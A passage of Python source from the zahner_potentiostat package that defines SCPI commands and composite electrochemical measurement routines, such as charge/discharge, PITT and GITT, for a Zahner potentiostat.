depending on whether the ramp is galvanostatic or potentiostatic. Alternatively, the ramp
starts from the final value of the last executed pimitive.
However, if the last primitive had a different coupling, a new value must be specified.
If the scanrate is not specifiedet the last value of the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setScanRateParameter` is used.
The same applies to duration there the value of the method :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter` is used.
Here the sign of the ramp is important and indicates the direction of the ramp.
The unit is in V/s or A/s depending on whether the command is called galvanostatic or potentiostatic.
The ramp can be aborted with the minimum or maximum values.
In addition to the dead time at the end of the ramp, as with all primitives, there are a few
milliseconds at the beginning of the ramp that are needed to initialize the ramp, this is not
necessary with POGA for example.
Used setup methods/parameters:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCoupling`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setScanRateParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxVoltageParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxCurrentParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumCurrentParameter`
:SCPI-COMMAND: :MEAS:RMPV?
:param targetValue: The target targetValue or None to use the old target targetValue.
:param scanrate: The scanrate to the target value.
:returns: The response string from the device.
:rtype: string
"""
if time != None:
self.setTimeParameter(time)
if scanrate != None:
self.setScanRateParameter(scanrate)
return self._writeCommandToInterfaceAndReadLine(":MEAS:RMPV?")
def measurePolarization(self) -> str:
"""POGA - Measurement of a potentiostatic or galvanostatic polarization.
This primitive outputs constant current or constant voltage for a maximum time, depending on
what has been set.
However, the primitive can be aborted prematurely if the complementary quantity, e.g. the
current in potentiostatic operation, exceeds a specified maximum current or falls below a
minimum current.
Likewise, the primitive can be aborted prematurely when the change of the complementary
quantity per time has fallen below a set value. For the abortion on a change, one can still
set a minimum duration of the primitive, which expires before the tolerance is checked.
With primitive potentiostatic and galvanostatic polarization, you can set an upper charge limit and a lower
charge limit. These are absolute signed values. For each primitive these values count
separately and for each primitive the charge starts at 0.
Used setup methods/parameters:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCoupling`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameterRelation`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxVoltageParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxCurrentParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setToleranceBreakEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setAbsoluteTolerance`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setRelativeTolerance`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setChargeBreakEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumCharge`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumCharge`
:SCPI-COMMAND: :MEAS:POGA?
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":MEAS:POGA?")
def measureOCVScan(self) -> str:
"""Measurement of open circuit voltage over time
However, the primitive can be aborted prematurely if the voltage in potentiostatic operation,
exceeds a maximum or falls below a minimum.
Likewise, the primitive can be aborted prematurely when the change of the voltage per time
has fallen below a set value. For the abortion on a change, one can still set a minimum
duration of the primitive, which expires before the tolerance is checked.
Used setup methods/parameters:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxVoltageParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxCurrentParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setToleranceBreakEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setAbsoluteTolerance`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setRelativeTolerance`
:SCPI-COMMAND: :MEAS:OCVS?
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":MEAS:OCVS?")
def measureOCV(self) -> str:
"""Measurement of open circuit voltage.
The potentiostat is automatically switched off by this method.
This method measures the open circuit voltage, and sets this open circuit voltage as a
reference for subsequent measurements when a voltage is to be referenced to OCV.
:SCPI-COMMAND: :MEAS:OCV?
:returns: The open circuit voltage.
:rtype: float
"""
return self._writeCommandToInterfaceAndReadValue(":MEAS:OCV?")
def measureIEStairs(self) -> str:
"""Measurement of a voltage or current staircase.
This primitive outputs a voltage or current staircase from the current current or voltage
value to a target value.
By default, only one measured value is recorded at the end of the step. The duration and
size of the step can be set. As with polarization, change tolerances and a minimum time after
which the next step is continued can also be set.
However, the primitive can be aborted prematurely if the complementary quantity, e.g. the
current in potentiostatic operation, exceeds a specified maximum current or falls below a
minimum current.
Used setup methods/parameters:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCoupling`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameterRelation`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxVoltageParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxCurrentParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumVoltageParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMaximumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumCurrentParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setToleranceBreakEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinimumTimeParameter`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setAbsoluteTolerance`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setRelativeTolerance`
:SCPI-COMMAND: :MEAS:IESC?
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":MEAS:IESC?")
"""
Method which were composed from primitve as an example.
"""
def checkConnectionPolarity(self) -> bool:
"""Check that the object is connected with the correct polarity.
This function is only to simplify the development of measurement methods from primitives,
for example, that a battery has a positive open circuit voltage.
This eliminates the need to handle cases when the OCV is negative, making everything clearer
and simpler.
:returns: True if the polarity is correct, else raise ValueError().
:rtype: float
"""
voltage = self.getVoltage()
if voltage < 0:
raise ValueError("OCP/OCV must be positive. Change polarity.")
return True
def measureCharge(
self,
current: float,
stopVoltage: float,
maximumTime: Union[float, str],
minimumVoltage: float = 0,
) -> str:
"""Charge an object.
It is charged with a positive current until a maximum voltage is reached. A maximum
time can also be defined. In theory, you should not need the minimum voltage, as the voltage
should increase during charging.
Global limits can be defined outside this method before the function call. Where the limits
should be chosen slightly larger, that the functional terminations with the lower priority
are used instead of the global terminations.
:param current: The charging current. The absolute value is used.
:param stopVoltage: The voltage up to which charging is to take place.
:param maximumTime: The maximum charging time.
:param minimumVoltage: You should not need the minimum voltage, as the voltage should
increase during charging.
:returns: The response string from the device, from :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measurePolarization`.
:rtype: string
"""
self.checkConnectionPolarity()
self.setCoupling("gal")
if current < 0:
raise ValueError("The current must be positive.")
self.setCurrentParameter(abs(current))
self.setMaximumVoltageParameter(stopVoltage)
self.setMinimumTimeParameter(0)
self.setMaximumTimeParameter(maximumTime)
self.setMinimumVoltageParameter(minimumVoltage)
self.setMinMaxVoltageParameterCheckEnabled(True)
return self.measurePolarization()
def measureDischarge(
self,
current: float,
stopVoltage: float,
maximumTime: Union[float, str],
maximumVoltage: Union[float, str] = 1000,
) -> str:
"""Discharge an object.
It is discharged with a negative current until a minimum voltage is reached. A maximum
time can also be defined. In theory, you should not need the maximum voltage, as the voltage
should decrease during discharging.
Global limits can be defined outside this method before the function call. Where the limits
should be chosen slightly larger, that the functional terminations with the lower priority
are used instead of the global terminations.
:param current: The discharging current. The absolute value * -1.0 is used.
:param stopVoltage: The voltage down to which discharging is to take place.
:param maximumTime: The maximum charging time.
:param maximumVoltage: You should not need the maximum voltage, as the voltage should
decrease during discharging.
:returns: The response string from the device, from :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measurePolarization`.
:rtype: string
"""
self.checkConnectionPolarity()
self.setCoupling("gal")
if current > 0:
raise ValueError("The current must be negative.")
self.setCurrentParameter(-1 * abs(current))
self.setMinimumVoltageParameter(stopVoltage)
self.setMaximumVoltageParameter(maximumVoltage)
self.setMinimumTimeParameter(0)
self.setMaximumTimeParameter(maximumTime)
self.setMinMaxVoltageParameterCheckEnabled(True)
return self.measurePolarization()
def measureProfile(
self,
profileDict: list[dict[str, float]],
coupling: COUPLING,
scalingFactor: float = 1,
outputPrimitive: str = "pol",
) -> None:
"""Output a sequence of POGA or ramps.
With this command a defined number of potentiostatic or galvanostatic polarizations or ramps can be output
one after the other. Galvanostatic and potentiostatic cannot be mixed at the moment.
The profile must be passed with the following data structure:
[{"time": 0, "value": 0.1},{"time": 1, "value": 0.4},{"time": 2, "value": 0.3}]
The structure is an array with a dictionary for each step. The dictionary has two keys:
time: The time point of the value.
value: The value, current or voltage, depending on the parameter coupling.
There is also an example to import data from an drive cycle.
driveCycle = :func:`~zahner_potentiostat.drivecycle.cycle_importer.getNormalisedCurrentTableForHUDDSCOL`
Note that this method is composed of calls to the individual primitives including their limitations
and peculiarities. Short dead times where no measurements are taken for data processing.
:param profileDict: Profile support points, see documentation above.
:param coupling: Coupling of measurement.
:type coupling: :class:`~zahner_potentiostat.scpi_control.control.COUPLING`
:param scalingFactor: Multiplier for the values from the dictionary, default 1, especially
for current normalization. But can also be used to multiply the voltage by a factor.
:param outputPrimitive: Default "pol" that means POGA, but "ramp" is also possible.
:rtype: None
"""
timestamp = profileDict[0]["time"]
value = profileDict[0]["value"]
lastTime = -100
self.setCoupling(coupling)
self.setMinimumTimeParameter(0)
if self._coupling == COUPLING.GALVANOSTATIC:
self.setCurrentParameter(value * scalingFactor)
else:
self.setVoltageParameter(value * scalingFactor)
self.setPotentiostatEnabled(True)
for point in profileDict[1:]:
nextTimestamp = point["time"]
if self._coupling == COUPLING.GALVANOSTATIC:
self.setCurrentParameter(value * scalingFactor)
else:
self.setVoltageParameter(value * scalingFactor)
time = nextTimestamp - timestamp
if "pol" in outputPrimitive:
if time != lastTime:
self.setMaximumTimeParameter(time)
self.measurePolarization()
else:
if time != lastTime:
self.setTimeParameter(time)
self.measureRampValueInTime()
lastTime = time
value = point["value"]
timestamp = nextTimestamp
self.setPotentiostatEnabled(False)
return
def measurePITT(
self,
targetVoltage: float,
endVoltage: float,
stepVoltage: float,
onTime: Union[float, str],
openCircuitTime: Union[float, str],
startWithOCVScan: bool = True,
measureOnTargetVoltage: bool = False,
) -> None:
"""PITT - Potentiostatic Intermittent Titration Technique
This is a simple basic implementation of PITT.
Global current and voltage interrupts can be set outside the method.
The functionality can be easily extended by additional parameters of the methods, such as
abort on change tolerances.
:param targetVoltage: The upper reverse voltage.
:param endVoltage: The voltage to finish the measurement.
:param stepVoltage: The voltage step size.
:param onTime: The time for the constant voltage phase.
:param openCircuitTime: The time for open circuit phase.
:param startWithOCVScan: Start with scan of the start potential, if false start with first step.
:param measureOnTargetVoltage: if True, then a measurement is made on the target voltage,
depending on the step size, the last step can then be smaller. If False, then the
last voltage measurement points can be between targetVoltage and
(targetVoltage - stepVoltage) size. With false the points are on the same
potential in the up and down cycle.
:rtype: None
"""
"""
Prepare Measurement
Charge break and Tolerance break are not supported.
"""
self.checkConnectionPolarity()
if stepVoltage <= 0:
raise ValueError("Step size must be bigger than 0.")
self.setMinimumTimeParameter(0)
self.setChargeBreakEnabled(False)
self.setToleranceBreakEnabled(False)
self.setCoupling("pot")
self.setVoltageParameterRelation(RELATION.ZERO)
self.setParameterLimitCheckToleranceTime(0.1)
currentVoltage = self.measureOCV()
"""
Up Cycle
"""
if startWithOCVScan:
self.setMaximumTimeParameter(openCircuitTime)
self.measureOCVScan()
currentVoltage += stepVoltage
while currentVoltage <= targetVoltage:
self.setMaximumTimeParameter(onTime)
self.setVoltageParameter(currentVoltage)
self.measurePolarization()
self.setMaximumTimeParameter(openCircuitTime)
self.measureOCVScan()
currentVoltage += stepVoltage
"""
Down Cycle
"""
if measureOnTargetVoltage == True:
currentVoltage = targetVoltage
else:
currentVoltage -= 2 * stepVoltage
while currentVoltage >= endVoltage:
self.setMaximumTimeParameter(onTime)
self.setVoltageParameter(currentVoltage)
self.measurePolarization()
self.setMaximumTimeParameter(openCircuitTime)
self.measureOCVScan()
currentVoltage -= stepVoltage
self.setPotentiostatEnabled("off")
return
def measureGITT(
self,
targetVoltage: float,
endVoltage: float,
current: float,
onTime: Union[float, str],
openCircuitTime: Union[float, str],
startWithOCVScan: bool = False,
) -> None:
"""GITT - Galvanostatic Intermittent Titration Technique
This is a simple basic implementation of PITT.
The functionality can be easily extended by additional parameters of the methods, such as
abort on change tolerances.
The software voltage limit of the device is used as the voltage limit. If this is exceeded,
the device returns an error condition. This error condition must be reset for further measurement.
To avoid false triggering of the limits, the limits that are not required are switched over.
:param targetVoltage: The upper reverse voltage.
:param endVoltage: The voltage to finish the measurement.
:param current: The value of current.
:param onTime: The time for the constant voltage phase.
:param openCircuitTime: The time for open circuit phase.
:param startWithOCVScan: Start with scan of the start potential, if false start with first step.
:rtype: None
"""
"""
Prepare Measurement
Charge break and Tolerance break are not supported.
"""
self.checkConnectionPolarity()
self.setMinimumTimeParameter(0)
self.setChargeBreakEnabled(False)
self.setToleranceBreakEnabled(False)
self.setCoupling("gal")
self.setCurrentParameter(abs(current))
self.setParameterLimitCheckToleranceTime(0.1)
self.setGlobalLimitCheckToleranceTime(0.1)
"""
The errors are needed by this function and are processed.
Error 12 means limit reached.
"""
oldRaiseOnErrorState = self.getRaiseOnErrorEnabled()
self.setRaiseOnErrorEnabled(False)
self.setMinMaxCurrentParameterCheckEnabled(False)
self.setMinMaxVoltageParameterCheckEnabled(False)
answerFromDevice = ""
currentVoltage = self.measureOCV()
self.setMaximumVoltageGlobal(targetVoltage)
if currentVoltage > endVoltage:
"""
Set the limit slightly lower to avoid erroneous errors.
"""
self.setMinimumVoltageGlobal(endVoltage * 0.9)
else:
self.setMinimumVoltageGlobal(currentVoltage * 0.9)
self.setGlobalVoltageCheckEnabled(True)
self.setGlobalCurrentCheckEnabled(False)
"""
Up Cycle - Charge
"""
if startWithOCVScan:
self.setMaximumTimeParameter(openCircuitTime)
self.measureOCVScan()
while "error" not in answerFromDevice:
self.setMaximumTimeParameter(onTime)
answerFromDevice = self.measurePolarization()
if "error" in answerFromDevice:
"""
Voltage Limit Reached
Set the limit slightly higher to avoid erroneous errors.
The voltage should become higher as the charge is applied.
"""
self.clearState()
self.setMaximumVoltageGlobal(targetVoltage * 1.1)
self.setMaximumTimeParameter(openCircuitTime)
self.measureOCVScan()
"""
Down Cycle - Discharge
"""
answerFromDevice = ""
self.setCurrentParameter(-1 * abs(current))
self.setMinimumVoltageGlobal(endVoltage)
while "error" not in answerFromDevice:
self.setMaximumTimeParameter(onTime)
answerFromDevice = self.measurePolarization()
if "error" in answerFromDevice:
"""
Voltage Limit Reached
Set the limit slightly lower to avoid erroneous errors.
"""
self.clearState()
self.setMinimumVoltageGlobal(endVoltage * 0.9)
self.setMaximumTimeParameter(openCircuitTime)
self.measureOCVScan()
self.setPotentiostatEnabled("off")
"""
Reset the original error output.
"""
self.setRaiseOnErrorEnabled(oldRaiseOnErrorState)
return
"""
Private internal used functions.
"""
def _processTimeInput(self, time: Union[float, str]) -> float:
"""Private function to process time inputs.
This function processes the input to a floating point number with a time specification in
seconds. All methods which set time parameters process the parameter with this method.
Times can then be passed as in the following examples:
* _processTimeInput(3.1415) Input as seconds.
* _processTimeInput("3.1415 s") Input as seconds.
* _processTimeInput("3.1415 m") Input as minutes.
* _processTimeInput("3.1415 min") Input as minutes.
* _processTimeInput("3.1415 h") Input as hours.
:param time: Time in format as described in the previous section.
:returns: Time in seconds as float value.
"""
retval = None
if isinstance(time, str):
"""
Now interpreting the string as time to process seconds minutes and hours.
"""
timeRegex = re.compile("([0-9]+[.,]?[0-9]*)[ ]*((min)|([mhs]))")
timeMatch = timeRegex.match(time)
if timeMatch.group(1) != None and timeMatch.group(2) != None:
valueString = timeMatch.group(1)
valueString.replace(",", ".")
retval = float(valueString)
if timeMatch.group(2) in "min" or timeMatch.group(2) in "m":
retval *= 60.0
elif timeMatch.group(2) in "h":
retval *= 3600.0
else:
raise ValueError("Specified time incorrect")
else:
retval = time
return retval
def _writeCommandToInterfaceAndReadValue(self, string: str) -> float:
"""Private function to send a command to the device and read a float.
This function sends the data to the device with the class SerialCommandInterface and waits
for a response. This response is then converted to a float.
:param string: String with command, without the line feed.
:returns: Float value.
:rtype: float
"""
line = self._writeCommandToInterfaceAndReadLine(string)
return float(line)
def _writeCommandToInterfaceAndReadLine(self, string: str) -> str:
"""Private function to send a command to the device and read a string.
This function sends the data to the device with the class SerialCommandInterface and waits
for a response.
This function also manages the possibility to send abort or reset in a second thread in
parallel to the first request to abort the primitive or to reset the device.
:raises ZahnerSCPIError: Error number.
:param string: String with command, without the line feed.
:returns: Response string from the device.
:rtype: string
"""
if "ABOR" in string or "*RST" in string:
line = self._commandInterface.sendStringAndWaitForReplyString(
string, CommandType.CONTROL
)
else:
line = self._commandInterface.sendStringAndWaitForReplyString(
string, CommandType.COMMAND
)
if "error" in line:
if DEBUG == True:
line = self._commandInterface.getLastCommandWithAnswer()
if self._raiseOnError == True:
errorNumber = 42 # undefined error
numberRegex = re.compile(r".*?([0-9]+).*")
numberMatch = numberRegex.match(line)
if numberMatch.group(1) != None:
errorNumber = int(numberMatch.group(1))
raise ZahnerSCPIError(errorNumber)
return line | zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/zahner_potentiostat/scpi_control/control.py | control.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.